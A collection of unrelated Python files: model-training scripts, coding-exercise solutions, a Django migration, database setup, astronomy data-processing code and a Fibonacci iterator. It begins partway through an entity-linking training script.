help="Path to pre-trained model or shortcut name selected in the list: " + ", ".join(ALL_MODELS),
)
parser.add_argument(
"--output_dir",
default=None,
type=str,
required=True,
help="The output directory where the model predictions and checkpoints will be written.",
)
parser.add_argument(
"--resume_path",
default=None,
type=str,
required=False,
help="Path to the checkpoint from where the training should resume"
)
# Other parameters
parser.add_argument(
"--config_name", default="", type=str, help="Pretrained config name or path if not the same as model_name"
)
parser.add_argument(
"--tokenizer_name",
default="",
type=str,
help="Pretrained tokenizer name or path if not the same as model_name",
)
parser.add_argument(
"--cache_dir",
default="",
type=str,
help="Where do you want to store the pre-trained models downloaded from s3",
)
parser.add_argument(
"--max_seq_length",
default=512,
type=int,
help="The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded.",
)
parser.add_argument(
"--max_mention_length",
default=20,
type=int,
help="Maximum length of a mention span"
)
parser.add_argument("--do_train", action="store_true", help="Whether to run training.")
parser.add_argument("--do_eval", action="store_true", help="Whether to run eval on the test set.")
parser.add_argument(
"--evaluate_during_training", action="store_true", help="Rul evaluation during training at each logging step."
)
parser.add_argument(
"--do_lower_case", action="store_true", default=False, help="Set this flag if you are using an uncased model."
)
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int, help="Batch size per GPU/CPU for training.")
parser.add_argument(
"--per_gpu_eval_batch_size", default=1, type=int, help="Batch size per GPU/CPU for evaluation."
)
parser.add_argument(
"--gradient_accumulation_steps",
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.",
)
parser.add_argument("--learning_rate", default=1e-5, type=float, help="The initial learning rate for Adam.")
parser.add_argument("--weight_decay", default=0.0, type=float, help="Weight decay if we apply some.")
parser.add_argument("--adam_epsilon", default=1e-8, type=float, help="Epsilon for Adam optimizer.")
parser.add_argument("--max_grad_norm", default=1.0, type=float, help="Max gradient norm.")
parser.add_argument(
"--num_train_epochs", default=3.0, type=float, help="Total number of training epochs to perform."
)
parser.add_argument(
"--max_steps",
default=-1,
type=int,
help="If > 0: set total number of training steps to perform. Override num_train_epochs.",
)
parser.add_argument("--warmup_steps", default=0, type=int, help="Linear warmup over warmup_steps.")
parser.add_argument("--logging_steps", type=int, default=100, help="Log every X updates steps.")
parser.add_argument("--save_steps", type=int, default=5000, help="Save checkpoint every X updates steps.")
parser.add_argument(
"--eval_all_checkpoints",
action="store_true",
help="Evaluate all checkpoints starting with the same prefix as model_name ending and ending with step number",
)
parser.add_argument("--no_cuda", action="store_true", help="Avoid using CUDA when available")
parser.add_argument("--n_gpu", type=int, default=1, help="Number of GPUs to use when available")
parser.add_argument(
"--overwrite_output_dir", action="store_true", help="Overwrite the content of the output directory"
)
parser.add_argument(
"--overwrite_cache", action="store_true", help="Overwrite the cached training and evaluation sets"
)
parser.add_argument(
"--use_random_candidates", action="store_true", help="Use random negative candidates during training"
)
parser.add_argument(
"--use_tfidf_candidates", action="store_true", help="Use random negative candidates during training"
)
parser.add_argument(
"--use_hard_negatives", action="store_true", help="Use hard negative candidates during training"
)
parser.add_argument(
"--use_hard_and_random_negatives", action="store_true", help="Use hard negative candidates during training"
)
parser.add_argument(
"--include_positive", action="store_true", help="Includes the positive candidate during inference"
)
parser.add_argument(
"--use_all_candidates", action="store_true", help="Use all entities as candidates"
)
parser.add_argument(
"--num_candidates", type=int, default=10, help="Number of candidates to consider per mention"
)
parser.add_argument(
"--num_max_mentions", type=int, default=8, help="Maximum number of mentions in a document"
)
parser.add_argument(
"--ner", type=bool, default=False, help="Model will perform only BIO tagging"
)
parser.add_argument(
"--alternate_batch", type=bool, default=False, help="Model will perform either BIO tagging or entity linking per batch during training"
)
parser.add_argument(
"--ner_and_ned", type=bool, default=True, help="Model will perform both BIO tagging and entity linking per batch during training"
)
parser.add_argument(
"--gamma", type=float, default=0, help="Threshold for mention candidate prunning"
)
parser.add_argument(
"--lambda_1", type=float, default=1, help="Weight of the random candidate loss"
)
parser.add_argument(
"--lambda_2", type=float, default=0, help="Weight of the hard negative candidate loss"
)
parser.add_argument("--seed", type=int, default=42, help="random seed for initialization")
parser.add_argument(
"--fp16",
action="store_true",
help="Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit",
)
parser.add_argument(
"--fp16_opt_level",
type=str,
default="O1",
help="For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3']."
"See details at https://nvidia.github.io/apex/amp.html",
)
parser.add_argument("--local_rank", type=int, default=-1, help="For distributed training: local_rank")
parser.add_argument("--server_ip", type=str, default="", help="For distant debugging.")
parser.add_argument("--server_port", type=str, default="", help="For distant debugging.")
args = parser.parse_args()
if (
os.path.exists(args.output_dir)
and os.listdir(args.output_dir)
and args.do_train
and not args.overwrite_output_dir
):
raise ValueError(
"Output directory ({}) already exists and is not empty. Use --overwrite_output_dir to overcome.".format(
args.output_dir
)
)
# Setup distant debugging if needed
if args.server_ip and args.server_port:
# Distant debugging - see https://code.visualstudio.com/docs/python/debugging#_attach-to-a-local-script
import ptvsd
print("Waiting for debugger attach")
ptvsd.enable_attach(address=(args.server_ip, args.server_port), redirect_output=True)
ptvsd.wait_for_attach()
# Setup CUDA, GPU & distributed training
if args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
if args.no_cuda:
args.n_gpu = 0
else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
torch.distributed.init_process_group(backend="nccl")
args.n_gpu = 1
args.device = device
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if args.local_rank in [-1, 0] else logging.WARN,
)
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
args.local_rank,
device,
args.n_gpu,
bool(args.local_rank != -1),
args.fp16,
)
# Set seed
set_seed(args)
# Load pretrained model and tokenizer
if args.local_rank not in [-1, 0]:
torch.distributed.barrier() # Make sure only the first process in distributed training will download model & vocab
args.model_type = args.model_type.lower()
config_class, model_class, tokenizer_class = MODEL_CLASSES[args.model_type]
config = config_class.from_pretrained(
args.config_name if args.config_name else args.model_name_or_path,
cache_dir=args.cache_dir if args.cache_dir else None,
)
tokenizer = tokenizer_class.from_pretrained(
args.tokenizer_name if args.tokenizer_name else args.model_name_or_path,
do_lower_case=args.do_lower_case,
cache_dir=args.cache_dir if args.cache_dir else None,
)
pretrained_bert = PreDualEncoder.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
cache_dir=args.cache_dir if args.cache_dir else None,
)
# Add new special tokens '[Ms]' and '[Me]' to tag mention
new_tokens = ['[Ms]', '[Me]']
num_added_tokens = tokenizer.add_tokens(new_tokens)
pretrained_bert.resize_token_embeddings(len(tokenizer))
model = DualEncoderBert(config, pretrained_bert)
if args.local_rank == 0:
torch.distributed.barrier() # Make sure only the first process in distributed training will download model & vocab
model.to(args.device)
logger.info("Training/evaluation parameters %s", args)
# Training
if args.do_train:
if args.resume_path is not None:
# Load a trained model and vocabulary from a saved checkpoint to resume training
model.load_state_dict(torch.load(os.path.join(args.resume_path, 'pytorch_model-1000000.bin')))
tokenizer = tokenizer_class.from_pretrained(args.resume_path)
model.to(args.device)
logger.info("INFO: Checkpoint loaded successfully. Training will resume from %s", args.resume_path)
global_step, tr_loss = train(args, model, tokenizer)
logger.info(" global_step = %s, average loss = %s", global_step, tr_loss)
# Saving best-practices: if you use defaults names for the model, you can reload it using from_pretrained()
if args.do_train and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
# Create output directory if needed
if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:
os.makedirs(args.output_dir)
logger.info("Saving model checkpoint to %s", args.output_dir)
# Save a trained model, configuration and tokenizer using `save_pretrained()`.
# They can then be reloaded using `from_pretrained()`
model_to_save = (
model.module if hasattr(model, "module") else model
) # Take care of distributed/parallel training
model_to_save.save_pretrained(args.output_dir)
tokenizer.save_pretrained(args.output_dir)
# Good practice: save your training arguments together with the trained model
torch.save(args, os.path.join(args.output_dir, "training_args.bin"))
# Load a trained model and vocabulary that you have fine-tuned
model.load_state_dict(torch.load(os.path.join(args.output_dir, 'pytorch_model-1000000.bin')))
tokenizer = tokenizer_class.from_pretrained(args.output_dir)
model.to(args.device)
# Evaluation
results = {}
if args.do_eval and args.local_rank in [-1, 0]:
tokenizer = tokenizer_class.from_pretrained(args.output_dir, do_lower_case=args.do_lower_case)
checkpoints = [args.output_dir]
if args.eval_all_checkpoints:
checkpoints = list(
os.path.dirname(c) for c in sorted(glob.glob(args.output_dir + "/**/" + WEIGHTS_NAME, recursive=True))
)
logging.getLogger("transformers.modeling_utils").setLevel(logging.WARN) # Reduce logging
logger.info("Evaluate the following checkpoints: %s", checkpoints)
for checkpoint in checkpoints:
global_step = checkpoint.split("-")[-1] if len(checkpoints) > 1 else ""
prefix = checkpoint.split("/")[-1] if checkpoint.find("checkpoint") != -1 else ""
model.load_state_dict(torch.load(os.path.join(checkpoint, 'pytorch_model-1000000.bin')))
model.to(args.device)
result = evaluate(args, model, tokenizer, prefix=prefix)
result = dict((k + "_{}".format(global_step), v) for k, v in result.items())
results.update(result)
return results
if __name__ == "__main__":
main()
|
# 2. Write a python program for the following:
# Input the string “Python” as a list of characters from console, delete at least 2 characters, reverse the resultant string and print it.
# users enters string input
text = list(input("Enter the text to be processed: "))
# excluding/ deleting first character of the string
result = "".join(text[1:])
# reverse the string
result_rev = result[::-1]
# excluding/ deleting first character of the string after string reversal
output = "".join(result_rev[1:])
# displaying the string output after deleting 2 characters and reversing the resultant string
print("Output string obtained: ", output)
|
# Generated by Django 3.2.4 on 2021-07-13 08:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('data_aggregator', '0012_alter_jobtype_type'),
]
operations = [
migrations.RenameField(
model_name='participation',
old_name='time_tardy',
new_name='time_total',
),
migrations.AddField(
model_name='participation',
name='max_page_views',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='participation',
name='max_participations',
field=models.IntegerField(null=True),
),
]
|
# -*- coding: utf-8 -*-
if __name__ == "__main__":
fid = open('rosalind_revc.txt','r')
output = open('main.out','w')
s = fid.readline().strip()
#read string
sta = s.replace('T','t').replace('t','a').replace('A','T').replace('a','A')
scg = sta.replace('C','c').replace('c','g').replace('G','C').replace('g','G')
output.write("%s" %(scg[::-1]))
fid.close()
output.close()
|
#
# @lc app=leetcode.cn id=509 lang=python3
#
# [509] 斐波那契数
#
# @lc code=start
class Solution:
def fib(self, n: int) -> int:
"""DP:自底向上"""
# 31/31 cases passed (28 ms)
# Your runtime beats 91.1 % of python3 submissions
# Your memory usage beats 17.92 % of python3 submissions (15 MB)
if n <= 1:
return n
pre, curr = 0, 1
for _ in range(n-1):
res = pre + curr
pre, curr = curr, res
return res
# """DP: 自顶向下"""
# # 31/31 cases passed (1172 ms)
# # Your runtime beats 5.28 % of python3 submissions
# # Your memory usage beats 5.13 % of python3 submissions (15.1 MB)
# if n <= 1:
# return n
# seen = {0: 0, 1: 1}
# if n-1 not in seen and n-2 not in seen:
# seen[n-2] = self.fib(n-2)
# seen[n-1] = self.fib(n-1)
# elif n-1 not in seen and n-2 in seen:
# seen[n-1] = self.fib(n-1)
# return seen[n-1] + seen[n-2]
# @lc code=end
|
#!/usr/bin/python
# createTables.py
import psycopg2
import sys
con = None
try:
con = psycopg2.connect(database='devel', user='mpozulp')
cur = con.cursor()
print 'Creating jobs table'
cur.execute("CREATE TABLE jobs ( \
jobid INT PRIMARY KEY, \
date CHAR(35), \
ncpus INT, \
procmodel CHAR(3), \
modules TEXT[], \
nodes TEXT[] \
)")
for npbid in ('bt','cg','ep','ft','\"is\"','lu','mg','sp'):
print 'Creating ' + npbid + ' table'
cur.execute("CREATE TABLE " + npbid + " ( \
jobid INT , \
class CHAR(1), \
nprocs INT, \
cflags text, \
runtime DOUBLE PRECISION, \
mflops DOUBLE PRECISION, \
verif BOOLEAN, \
PRIMARY KEY(jobid, mflops) \
)")
con.commit()
except psycopg2.DatabaseError, e:
if con:
con.rollback()
print 'Error %s' %e
sys.exit(1)
finally:
if con:
con.close()
|
from flask_restplus import Api
from .authenticate_api import api as ns_authenticate
from .park_api import api as ns_park
from .generate_parking_lot_api import api as ns_generate_parking_lot
API_PREFIX = '/pp/v1'
# authorizations = {}
api = Api()
api.add_namespace(ns_authenticate, path=API_PREFIX+'/authenticate')
api.add_namespace(ns_generate_parking_lot, path=API_PREFIX+'/generateParkingLot')
api.add_namespace(ns_park, path=API_PREFIX+'/park')
|
from PIL import Image
import numpy as np
import pandas as pd
import sys
# pass in pixel1, and pixel2 as np arrays
def directional_derivative(pixel1, pixel2):
return pixel1 - pixel2
# pass in a pixel as an np array
def norm(pixel):
return np.inner(pixel, pixel)
def edge_detection(pixel, epsilon, image, n):
# find norms of all neighboring pixels
# get a list of neighbouring pixels
# n = 3 # this corresponds to precision
(x,y) = pixel
nbrs = image[x-n:x+n+1,y-n:y+n+1]
derivatives = [directional_derivative(image[x,y], p) for p in nbrs if image[x,y] != p]
norms = [norm(p) for p in derivatives]
sup = max(norms)
if sup > epsilon:
image[x,y] = (0,0,0) # set pixel to black
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#############################################################################
# #
# create_sib_data.py: create sib data for report #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# Last Update: Mar 03, 2021 #
# #
#############################################################################
import sys
import os
import string
import re
import math
import unittest
import astropy.io.fits as pyfits
import time
import Chandra.Time
import random
#
#--- reading directory list
#
path = '/data/mta/Script/ACIS/SIB/house_keeping/dir_list_py'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append path to a private folders
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
import mta_common_functions as mcf
import sib_corr_functions as scf
import ccd_comb_plot as ccp
import update_html as uph
#
#--- temp writing file name
#
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#-----------------------------------------------------------------------------------------
#-- create_report: process the accumulated sib data and create a month long data fits files
#-----------------------------------------------------------------------------------------
def create_report(year='', mon=''):
"""
process the accumulated sib data and create a month long data fits files
input: year --- year; optional, if it is not given, the script will assign
mon --- mon; optional, if it is not given, the script will assign
read from <lev>/Outdir/lres/*fits
output: lres_ccd<ccd>_merged.fits in ./Data/ directory
"""
#
#--- find data periods
#
[begin, end, syear, smon, eyear, emon] = set_date(year, mon)
#
#--- process all data for the month
#
create_sib_data("Lev2", begin, end, syear, smon)
create_sib_data("Lev1", begin, end, syear, smon)
#
#--- plot data and update html pages
#
ccp.ccd_comb_plot('normal')
uph.update_html()
uph.add_date_on_html()
#
#--- clean up directories
#
cleanup_sib_dir("Lev1", smon, syear)
cleanup_sib_dir("Lev2", smon, syear)
#-----------------------------------------------------------------------------------------
#-- create_sib_data: create sib data for report --
#-----------------------------------------------------------------------------------------
def create_sib_data(lev, begin, end, syear, smon):
"""
create sib data for report
input: lev --- level of data either Lev1 or Lev2
output: combined data, plots, and updated html pages
"""
#
#--- correct factor
#
correct_factor(lev)
#
#--- exclude all high count rate observations
#
find_excess_file(lev)
#
#--- combine the data
#
sib_corr_comb(begin, end , lev)
#
#--- make data directory
#
lmon = str(smon)
if smon < 10:
lmon = '0' + lmon
if lev == 'Lev1':
dname = data_dir + 'Data_' + str(syear) + '_' + lmon
else:
dname = data_dir2 + 'Data_' + str(syear) + '_' + lmon
cmd = 'mkdir -p ' + dname
os.system(cmd)
cmd = 'mv -f ' + cor_dir + lev + '/Data/* ' + dname
os.system(cmd)
#-----------------------------------------------------------------------------------------
#-- set_date: set the data for the last month ---
#-----------------------------------------------------------------------------------------
def set_date(year, mon):
"""
set the data for the last month
input: year --- year; optional
mon --- mon; optional
output: begni --- starting date in <yyyy>:<ddd>:<hh>:<mm>:<ss>
end --- stopping date in <yyyy>:<ddd>:<hh>:<mm>:<ss>
syear --- year of the starting time
smon --- month of the starting time
eyear --- year of the ending time
emon --- month of the ending time
"""
#
#--- if the year/month are not give, find today's date information (in local time)
#
if year == '':
tlist = time.localtime()
#
#--- set data time interval to the 1st of the last month to the 1st of this month
#
eyear = tlist[0]
emon = tlist[1]
else:
eyear = year
emon = mon + 1
if emon > 12:
emon = 1
eyear += 1
tline = str(eyear) + ' ' +str(emon) + ' 1'
tlist = time.strptime(tline, "%Y %m %d")
eyday = tlist[7]
lyday = mcf.add_leading_zero(eyday, 3)
end = str(eyear) + ':' + str(lyday) + ':00:00:00'
syear = eyear
smon = emon - 1
if smon < 1:
syear -= 1
smon = 12
tline = str(syear) + ' ' +str(smon) + ' 1'
tlist = time.strptime(tline, "%Y %m %d")
syday = tlist[7]
lyday = mcf.add_leading_zero(syday, 3)
begin = str(syear) + ':' + str(lyday) + ':00:00:00'
return [begin, end, syear, smon, eyear, emon]
#-----------------------------------------------------------------------------------------
#-- cleanup_sib_dir: clean up the working directories --
#-----------------------------------------------------------------------------------------
def cleanup_sib_dir(lev, mon, year):
"""
clean up the working directories
input: lev --- data level
mon --- month of the data processed
year --- year of the data processd
output: none
"""
lmon = mcf.change_month_format(mon)
lmon = lmon.lower()
cmd = 'mv ' + cor_dir + lev + '/Outdir/lres '
cmd = cmd + cor_dir + lev + '/Outdir/lres_' + lmon +str(year) + '_modified'
os.system(cmd)
cmd = 'rm -rf ' + cor_dir + lev + '/Outdir/ctirm_dir'
os.system(cmd)
cmd = 'rm -rf ' + cor_dir + lev + '/Outdir/filtered'
os.system(cmd)
cmd = 'rm -rf ' + cor_dir + lev + '/Outdir/hres'
os.system(cmd)
#-----------------------------------------------------------------------------------------
#-- correct_factor: adjust lres reuslts files for the area removed as the sources remvoed
#-----------------------------------------------------------------------------------------
def correct_factor(lev):
"""
adjust lres reuslts files for the area removed as the sources remvoed
input: lev --- level 1 or 2
output: adjusted fits files in lres
"""
#
#--- read all correciton factor information
#
ifile = cor_dir + lev + '/Reg_files/ratio_table'
data = mcf.read_data_file(ifile)
ratio = {}
for ent in data:
atemp = re.split(':', ent)
rate = float(atemp[1].strip())
btemp = re.split('N', atemp[0])
mc = re.search('_', btemp[0])
if mc is not None:
ctemp = re.split('_', btemp[0])
msid = ctemp[0]
else:
msid = btemp[0]
ctemp = re.split('ccd', atemp[0])
dtemp = re.split('_', ctemp[1])
ccd = dtemp[0]
ind = str(msid) + '.' + str(ccd)
ratio[ind] = rate
#
#--- find all fits file names processed
#
cmd = 'ls ' + cor_dir + lev + '/Outdir/lres/mtaf*.fits > ' + zspace
os.system(cmd)
data = mcf.read_data_file(zspace, remove=1)
for fits in data:
atemp = re.split('N', fits)
btemp = re.split('mtaf', atemp[0])
msid = btemp[1]
mc = re.search('_', msid)
if mc is not None:
ctemp = re.split('_', msid)
msid = ctemp[0]
atemp = re.split('acis', fits)
btemp = re.split('lres', atemp[1])
ccd = btemp[0]
ind = str(msid) + '.' + str(ccd)
try:
div = ratio[ind]
except:
continue
if div >= 1:
continue
#
#--- correct the observation rate by devided by the ratio
#--- (all sources removed area)/(original are)
#
elif div > 0:
line = 'SSoft=SSoft/' + str(div) + ',Soft=Soft/'
line = line + str(div) + ',Med=Med/' + str(div) + ','
line = line + 'Hard=Hard/' + str(div) + ',Harder=Harder/'
line = line + str(div) + ',Hardest=Hardest/' + str(div)
cmd = 'dmtcalc infile =' + ent + ' outfile=out.fits expression="'
cmd = cmd + line + '" clobber=yes'
scf.run_ascds(cmd)
cmd = 'mv out.fits ' + ent
os.system(cmd)
else:
print("Warning!!! div < 0 for " + str(ent))
continue
#-----------------------------------------------------------------------------------------
#-- find_excess_file: find data with extremely high radiation and remove it --
#-----------------------------------------------------------------------------------------
def find_excess_file(lev = 'Lev2'):
"""
find data with extremely high radiation and remove it.
this is done mainly in Lev2 and copied the procesure in Lev2
input: lev --- level. default Lev2 (other option is Lev1)
output: excess radiation data fits files in ./lres/Save/.
"""
if lev == 'Lev2':
lres = cor_dir + lev + '/Outdir/lres/'
cmd = 'ls ' + lres + 'mtaf*fits > ' + zspace
os.system(cmd)
data = mcf.read_data_file(zspace, remove=1)
cmd = 'mkdir ' + lres + 'Save'
os.system(cmd)
for ent in data:
cmd = 'dmlist ' + ent + ' opt=data > ' + zspace
try:
scf.run_ascds(cmd)
except:
continue
out = mcf.read_data_file(zspace, remove=1)
ssoft = 0.0
soft = 0.0
med = 0.0
hard = 0.0
harder = 0.0
hardest = 0.0
tot = 0.0
for val in out:
atemp = re.split('\s+', val)
try:
chk = float(atemp[0])
ssoft += float(atemp[6])
soft += float(atemp[7])
med += float(atemp[8])
hard += float(atemp[9])
harder += float(atemp[10])
hardest += float(atemp[11])
tot += 1.0
except:
continue
if tot > 1:
ssoft /= tot
soft /= tot
med /= tot
hard /= tot
harder /= tot
hardest /= tot
mc = re.search('acis6', ent)
chk = 0
if mc is not None:
if (med > 200):
chk = 1
else:
if (soft > 500) or (med > 150):
chk = 1
if chk > 0:
cmd = 'mv ' + ent + ' ' + lres + 'Save/.'
os.system(cmd)
else:
#
#--- for Lev1, we move the files which removed in Lev2. we assume that we already
#--- run Lev2 on this function
#
epath = cor_dir + '/Lev2/Outdir/lres/Save/'
if os.listdir(epath) != []:
cmd = 'ls ' + cor_dir + '/Lev2/Outdir/lres/Save/*fits > ' + zspace
os.system(cmd)
data = mcf.read_data_file(zspace, remove=1)
l1_lres = cor_dir + '/Lev1/Outdir/lres/'
l1_dir = l1_lres + '/Save/'
cmd = 'mkdir ' + l1_dir
os.system(cmd)
for ent in data:
atemp = re.split('mtaf', ent)
btemp = re.split('N', atemp[1])
mc = re.search('_', btemp[0])
if mc is not None:
ctemp = re.split('_', btemp[0])
obsid = ctemp[0]
else:
obsid = btemp[0]
atemp = re.split('acis', ent)
btemp = re.split('lres', atemp[1])
ccd = btemp[0]
cid = 'acis' + str(ccd) + 'lres_sibkg.fits'
cmd = 'mv ' + l1_lres + 'mtaf' + obsid + '*' + cid + ' ' + l1_dir + '/.'
os.system(cmd)
#-----------------------------------------------------------------------------------------
#-- sib_corr_comb: combined fits files into one per ccd --
#-----------------------------------------------------------------------------------------
def sib_corr_comb(start, stop, lev):
"""
combined fits files into one per ccd
input: start --- start time of the interval <yyyy>:<ddd>:<hh>:<mm>:<ss>
stop --- stop time of the interval <yyyy>:<ddd>:<hh>:<mm>:<ss>
lev --- data level "Lev1" or "Lve2"
output: combined data: lres_ccd<ccd>_merged.fits in Data directory
"""
#
#--- convert the time to seconds from 1998.1.1
#
tstart = Chandra.Time.DateTime(start).secs
tstop = Chandra.Time.DateTime(stop).secs
#
#--- make a list of data fits files
#
lres = cor_dir + lev + '/Outdir/lres/'
cmd = 'ls ' + lres + '*fits > ' + zspace
os.system(cmd)
data = mcf.read_data_file(zspace, remove=1)
#
#--- initialize ccd_list
#
ccd_list = [[] for x in range(0, 10)]
for ent in data:
#
#--- check whether the data are inside of the specified time period
#
[tmin, tmax] = find_time_interval(ent)
if tmin >= tstart and tmax <= tstop:
btemp = re.split('_acis', ent)
head = btemp[0]
#
#--- add the fits file to ccd_list
#
for ccd in range(0, 10):
chk = 'acis' + str(ccd)
mc = re.search(chk, ent)
if mc is not None:
ccd_list[ccd].append(str(ent))
break
#
#--- combined all fits files of a specific ccd into one fits file
#
for ccd in range(0, 10):
if len(ccd_list[ccd]) > 0:
#
#--- the first of the list is simply copied to temp.fits
#
cmd = 'cp ' + ccd_list[ccd][0] + ' temp.fits'
os.system(cmd)
for k in range(1, len(ccd_list[ccd])):
cmd = 'dmmerge "' + ccd_list[ccd][k]
cmd = cmd + ',temp.fits" outfile=zmerged.fits outBlock=""'
cmd = cmd + 'columnList="" clobber="yes"'
try:
scf.run_ascds(cmd)
except:
continue
cmd = 'mv ./zmerged.fits ./temp.fits'
os.system(cmd)
cmd = 'mv ./temp.fits ' + cor_dir + lev + '/Data/lres_ccd'
cmd = cmd + str(ccd) + '_merged.fits'
os.system(cmd)
#-----------------------------------------------------------------------------------------
#-- find_time_interval: find time interval of the fits file --
#-----------------------------------------------------------------------------------------
def find_time_interval(fits):
"""
find time interval of the fits file
input: fits --- fits file name
output: [tmin, tmax] --- start and stop time in seconds from 1998.1.1
"""
fout = pyfits.open(fits)
fdata = fout[1].data
tout = fdata['time']
tmin = min(tout)
tmax = max(tout)
return [tmin, tmax]
#-----------------------------------------------------------------------------------------
if __name__ == '__main__':
if len(sys.argv) == 3:
year = int(sys.argv[1])
mon = int(sys.argv[2])
create_report(year=year, mon=mon)
else:
create_report()
|
from numba import jit
ifunc = {
"dunkin": {"love": 1, "rayleigh": 2},
"fast-delta": {"love": 1, "rayleigh": 3},
}
ipar = {
"thickness": 0,
"velocity_p": 1,
"velocity_s": 2,
"density": 3,
}
def jitted(*args, **kwargs):
"""Custom :func:`jit` with default options."""
kwargs.update(
{
"nopython": True,
"nogil": True,
"fastmath": True,
# "boundscheck": False,
"cache": True,
}
)
return jit(*args, **kwargs)
|
# 各个不同网络的冻结与微调
# 冻结和微调
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam, SGD
import numpy as np
from keras.applications import ResNet50, VGG19, InceptionV3, MobileNet, NASNetMobile, Xception,DenseNet121
import matplotlib.pyplot as plt
import gc
# tf.test.gpu_device_name()
model_name = "DenseNet121" # 选择使用哪种模型,ResNet50, VGG19, InceptionV3, MobileNet,NASNetMobile,DenseNet121
train_epochs0 = 5 # 设置冻结训练轮次
train_epochs1 = 7 # 设置微调训练轮次
ad = 0.0001 # 微调时学习率 ,冻结时默认0.001
def show_history_mse2(history0, history1): # 绘制mse图像
plt.plot(history0.history['loss'] + history1.history['loss'])
plt.plot(history0.history['val_loss'] + history1.history['val_loss'])
plt.title(model_name + ' mse')
plt.ylabel('loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Test'], loc='upper left')
plt.savefig('drive/app/' + model_name + '_mse.jpg', dpi=200)
plt.show()
# 输出loss和val_loss
print(history0.history['loss'] + history1.history['loss'])
print(history0.history['val_loss'] + history1.history['val_loss'])
def prepare_data(): # 取数据
print("prepare data")
X = np.load('drive/app/X_data.npy')
Y = np.load('drive/app/Y_data.npy')
# 统一X和Y的数量级
X = X / 25
# 切片,统一数量级
x_train = X[:5000]
y_train = Y[:5000]
x_test = X[5000:]
y_test = Y[5000:]
del X
del Y
c = gc.collect() # 内存回收
print(c)
return (x_train, y_train, x_test, y_test)
def change_model(model0): # 选择模型
if model0 == "ResNet50":
tr_model = ResNet50(include_top=False, weights='imagenet', input_shape=(220, 220, 3), pooling='avg')
elif model0 == "VGG19":
tr_model = VGG19(include_top=False, weights='imagenet', input_shape=(220, 220, 3), pooling='avg')
elif model0 == "InceptionV3":
tr_model = InceptionV3(include_top=False, weights='imagenet', input_shape=(220, 220, 3), pooling='avg')
# 不能用input_shape=(220, 220, 3)
#elif model0 == "MobileNet":
# tr_model = MobileNet(include_top=False, weights='imagenet', input_shape=(220, 220, 3), pooling='avg')
#只能在weights=None时使用
#elif model0 == "NASNetMobile":
# tr_model = NASNetMobile(include_top=False, weights='imagenet', input_shape=(220, 220, 3), pooling='avg')
elif model0 == "Xception":
tr_model = Xception(include_top=False, weights='imagenet', input_shape=(220, 220, 3), pooling='avg')
elif model0 == "DenseNet121":
tr_model = DenseNet121(include_top=False, weights='imagenet', input_shape=(220, 220, 3), pooling='avg')
return tr_model
if __name__ == '__main__':
x_train, y_train, x_test, y_test = prepare_data()
transfer_model = change_model(model_name)
# transfer_model = ResNet50(include_top=False, weights='imagenet', input_shape=(220, 220, 3), pooling='avg')
model = Sequential()
model.add(transfer_model)
model.add(Dense(1, name="aaa"))
# 冻结------------------------------------------
print("Frozen!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
# 设置transfer_model不可训练
model.layers[0].trainable = False
# print(transfer_model.summary())
print(model.summary())
print("compile")
model.compile(loss='mean_squared_error', optimizer=Adam())
print("fit")
Hist = model.fit(x_train, y_train, epochs=train_epochs0, batch_size=64, validation_data=(x_test, y_test))
model.save_weights('drive/app/weight.h5')
print(Hist.history)
# 微调---------------------------------------------
print("Finetuning!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
# 设置transfer_model可训练
model2 = Sequential()
model2.add(transfer_model)
model2.add(Dense(1, name="aaa"))
model2.load_weights('drive/app/weight.h5', by_name=True)
for layer in model2.layers:
layer.trainable = True
print(model2.summary())
print("compile")
model2.compile(loss='mean_squared_error', optimizer=Adam(lr=ad))
print("fit")
Hist2 = model2.fit(x_train, y_train, epochs=train_epochs1, batch_size=64, validation_data=(x_test, y_test))
print(Hist2.history)
# 输出图像---------------------------------------------
show_history_mse2(Hist, Hist2)
model2.save('drive/app/' + model_name + '_model.h5')
del x_train
del y_train
del x_test
del y_test
c = gc.collect() # 内存回收
print(c)
|
'''Fibonacci iterator'''
class Fib:
'''iterator that yields numbers in the Fibonacci sequence'''
def __init__(self, max):
self.max = max
def __iter__(self):
self.a = 0
self.b = 1
return self
def __next__(self):
fib = self.a
if fib > self.max:
raise StopIteration
self.a, self.b = self.b, self.a + self.b
return fib
# Copyright (c) 2009, Mark Pilgrim, All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
